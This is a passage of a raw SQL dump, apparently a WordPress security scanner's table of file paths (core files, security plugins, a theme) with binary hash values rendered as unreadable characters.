[�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�u��<e�x��@ֈˆ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=N��9�ΡH�.^�','{#�n�ѐXEx˰���&�|�\nk%��}xjM-ND','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�蔺���/�Oޕo�M','}�6��Z��;�4M��vՊo�1�a󬑢��','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J���x�\'ÂF2[&','E��pp;/�\ZO��eG����ql�&oC�9','',0,'?'),('�����C�	#a��S�[','wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ZX�x�3)�','m�io�j�6XP�J��y��vx���ܧ','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�t�~������*�ֆ','wp-includes/blocks/page-list/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ss��*=�\\�(\Z��','�J	���&�eoZ��� $�Jȝgt*6�=�0T','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_Z���+��g�m)','Ϙ������8�.��\n��rC2=@��v	U','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�H駖�P�at �V�\'e','wp-content/plugins/redirection/redirection-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۫A�lKX��}i�%F','�^t��x�3f���2ZH�QA��H�����','',0,'?'),('�V[s)R��@3,®�','wp-content/plugins/redirection/locale/json/redirection-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�򞚶�A9>_\Z.m','�GV�S$M_�Kt,[�tr̛5#��\'��{��e','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B:�#�Fx�؊��','s3a�5����������)�ටb��$\0w�','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�tfF	�r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�ꫯ�y�5�pc','0(��5D�=U��Ԕ~���ڈI\")�7h','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Խ��Kܑ�+�q�_','�L)��5(-�E�=PW���\0�\n���#�n9	','',0,'?'),('�(�`hqQ`~�X��','wp-content/plugins/redirection/matches/login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SS:?l���]�\0��h','���g��FP-�Qlk��������T7Ŋ�','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�PC<��	���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�)	~����ܖݟr','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+:�C�����g�Q','(�#���><���\"(\n��\'K������','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��?�q>�@���p','\0{aq�(w�!Iz�}+�l�x/I0�9|1%�����','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('��½�ց%p�g�=','wp-content/plugins/wordfence/js/knockout-3.5.1.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��aUHw˲I��O','����&�$�z��;o,��4�ca����','',0,'?'),('��M��{x�J�H��','wp-includes/blocks/pullquote/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�PRPp��iy+T���','7`��Q�yg�7s�%\'_��dLڿ���P��','',0,'?'),('��q�oT�;h^̀','wp-content/plugins/redirection/database/schema/232.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�W{�+N�s��-�','�m�k��ה\0�X��˝J�eO�L�΁vT��','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O;I��U��޳=��w','@U�=�:3�HGBkՂ���D�q5���׆�)�','',0,'?'),('��ꑉ}�Oa�T�TN.','wp-includes/blocks/search/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���� �N+~/�7z','�,�G*����?a�~�q�<�2E9�fa���=','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�\Z�[�M��[�\r�','wp-includes/blocks/columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~^��d�J�ꨡ���','�<@��K�W��q%4b�~�$�}!�bg���y�2','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŝ*�7��P	rx��','�ô�p�`)��28�$iw6�J�g�jnD�j','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�f��E\r�ܷe3','�-��S�?�R8#�V��1@_�����W\r>�^','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�_���bes��?�7�','(t��{AG�X0ur�Ť�\0���G�����','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O 	�.�����.��>��CEj��','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\Z�Nw�2��%���|','�F��\ZJ7\r��sJ���m��cE\"��p/�&z��N','',0,'?'),('���yx����x4*� ','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BP����r�粓\0�','[f���v���AlԻ˄N�A:4QP�����	r','',0,'?'),('��H�С���YVhZ�','wp-includes/block-supports/duotone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�™|7�:@f즕','������:��~�K�J2h�B���w�j��%�','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�؀uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i�	b�4l~�e�F��mj�','',0,'?'),('��O­\n	�U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�;��P�#S\Z�0|]�c','v��C���	a�\'F�;���z���(eJ��L','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,׾����ay\\�s�A\'','',0,'?'),('���7����Rr˜�','wp-content/plugins/redirection/locale/json/redirection-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7Ϙ�I}�|F ��7','粸��ǩ>���3U�[���l�?�Î�0\"z�','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[?��r�a�azž�7','��w��z\Z�v?��fG(q�ӗ8\"w�]oV�','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�>�G�26�5����b','wp-content/plugins/wordfence/js/wfdropdown.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��Q�Gn���ϋ�','X�y�p��;@�F��]=sn|���v�(�L','',0,'?'),('�he��-�BJ��_v�','wp-includes/blocks/search/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\Z��V6}r��^���','|dV�X�P7:���L!{Nd.5A�TP��%�$','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nf�u�\Z\\A��0o�)','���l��us�o	��n�Gǝ��NU1�`9.�','',0,'?'),('��犏`bI�\"v4�N�','wp-includes/blocks/cover/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z.Q�9�S�P�{_{O','n� �HB��<��Bn�4�EP�R�9��Ǔ+�b','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� �b����d�]F�i�POZq��','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L3�ӫ���{�G�p@','�������31��0Z����YX�~7�z','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F`W�3�U���H�','ߘ��c.5%i��IA��4��Zz5�I����}','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h�	o�\\`��Y��','',0,'?'),('�ɔ/�	yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�O�\0�Q,�N 4$�N��','wp-content/plugins/redirection/redirection-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iW(�f1�I��\'퐢A�','�\\�缒v%�eĂ*<DM5E�&%��y����','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J*E�%v	N�a!��Uw','M��#3�a@xh���s\r5qB�N٣�X#��','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('��\\���0O�\'w[l/^$','wp-includes/blocks/gallery/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.����7��g�YL�uz','���N�\ZUyn�;;�E(?�bfs�Iofر1�2','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�<h�iѭ3*�	Fq','wp-includes/blocks/button/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��q����\0e��]j','q��kdˤ�p���^�ℙ��|:˷\0�;YujF','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\n��@!�#�D[�`�f','0���GO���޼��}����Tۙ��^v1��t','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Θ�>I�Vp�F�G�N}','iD@�V>k��(�t#	�`�9���H*\'��c���','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��ʽ�z\r�Q<�N�G','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('������dN����h�,','wp-content/plugins/redirection/models/monitor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�K}��	�(.6`P�','t����a�?j�u�k. p��<	ރ�)','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-�	�o�=��8,;h�\'LFR#�ʜB','',0,'?'),('�鰸y������\"�q�','wp-content/plugins/wordfence/js/jquery.colorbox-min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('��ڙy�2D\na��93','wp-includes/block-supports/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABɳ@jƑ!B6�‡�','s7M��?�roqA���I��P��I��`i�','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ�	#��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t6��9�*���J==�','-esT1z�� �WOC���S�a�Q�F��p0','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v	��~�%W\Z���','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/2�;����(��U���','i-���;R�9��s�	�bl��:XJ$�K�	�','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('��<eJ���5}��j','wp-includes/blocks/site-logo/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�J.�����~��','R�\\.��N���~�i71��Q��\rt�4�I9','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=1WФ���c	�2{L','�qA��KD��:\n�\\v�>�o�T^�`���','',0,'?'),('���<�	�f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ĝ-+\Z�\ry{-�{\nJ','���������RŇ��m�xqA�.���8e�3	','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dނ@��)1	��.�1k','�Ӗ��w�\n���c^?q�7}Xb*��\'�*$�','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��{Z��V���$��','wp-includes/blocks/social-links/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�ifM�X5p�E3','�-��q=����UV�>��D�ƹ�E�|HC[�','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ϯ\r�Mdz�c�|L','�xr�	�ߔ��څ^�ƨ�|�& ���ߊ5ӹ�','',0,'?'),('�\n�Y�?�!��wH�L�','wp-content/plugins/wordfence/css/phpinfo.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��[���A.F3D�','@��ړ�V�C�+��<!;@8���9�(�n=�G','',0,'?'),('�,3.0m�ʖ��K,T','wp-content/plugins/redirection/locale/redirection-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w{u�w�7���','j��8�����b�9�$m�@ s&U�\Z��Y','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','М���������s�','��a:�F���V�W�5W�<n�o`��','',0,'?'),('�7ʏ��aB�Kz','wp-includes/blocks/button/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��E�\Z�:����','{�p�C�٥F��7]h\Z~s42C���FC\r��<:','',0,'?'),('�Q�`G\r��>l�','wp-content/themes/newsmagbd/inc/customizer/assets/css/customizer-controll.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��	bF��p�XB�','\Z�ѡ)‰h�<��#�i~P+�Y�,�S�s[}��','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��